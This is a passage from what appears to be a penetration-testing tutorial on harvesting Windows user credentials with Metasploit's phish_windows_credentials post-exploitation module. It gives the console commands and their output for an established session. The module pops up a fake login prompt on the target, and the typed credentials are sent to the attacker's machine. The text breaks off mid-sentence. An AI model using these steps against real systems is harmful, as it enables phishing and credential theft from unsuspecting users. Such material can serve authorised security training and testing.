To harvest credentials, we will use the Windows Gather User Credentials post-exploitation module with which we are able to perform a phishing attack on the target by popping up a login prompt.
- When the user types his/her credentials into the login prompt, they will be sent to our attacker machine:
msf > use post/windows/gather/phish_windows_credentialsmsf post(phish_windows_credentials) > set SESSION 1SESSION => 1msf post(phish_windows_credentials) > run[+] PowerShell is installed.[*] Starting the popup script. Waiting on the user to fill in his credentials...[+] #< CLIXML
- On the target machine, we should see the login prompt, waiting for the user to fill in his/her credentials:
- When the user fills in the login prompt, ...